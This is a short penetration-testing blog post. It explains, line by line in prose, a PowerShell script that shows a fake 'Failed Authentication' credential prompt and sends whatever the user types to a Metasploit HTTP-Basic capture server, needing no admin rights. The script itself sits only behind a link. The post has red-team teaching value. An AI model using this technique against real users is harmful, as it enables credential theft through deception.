Powershell Popups + Caputre

Cross post form: https://www.room362.com/blog/2015/01/12/powershell-popups-plus-capture/

Metasploit Minute has entered into it’s 3rd “season”. And we kick it off with using the Metasploit capture modules to capture creds from this powershell popup. The cool thing about this is you can leave it to execute on a system without any other code on disk and get creds constantly as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free.. over SSL. ;–)

Here is the code:

https://gist.github.com/mubix/b0fee7ba02ba8a225125

Lets break down the code line by line:

This tells windows to prompt for credentials, with the title of “Failed Authentication”, no info in the comment (so it uses default), and include the username and domain in the box to add authenticity. Thats where all the magic is, everything else is just gravy.

Tells powershell not to verify SSL certificates (allows us to use self signed certs in the HTTPS transaction later

Creates a new webclient object.

Tells powershell to use whatever proxy the current user uses with whatever credentials they have cached. If one or both are unnecessary it just ignores these settings.

Tells powershell that the HTTP-Basic credentials to use are the ones typed in the popup box recently by the user.

And finally the request to HTTP-Basic capture module in metasploit, but you could have anything you want capture these creds.

Then execute and you get this:

and:

Game over!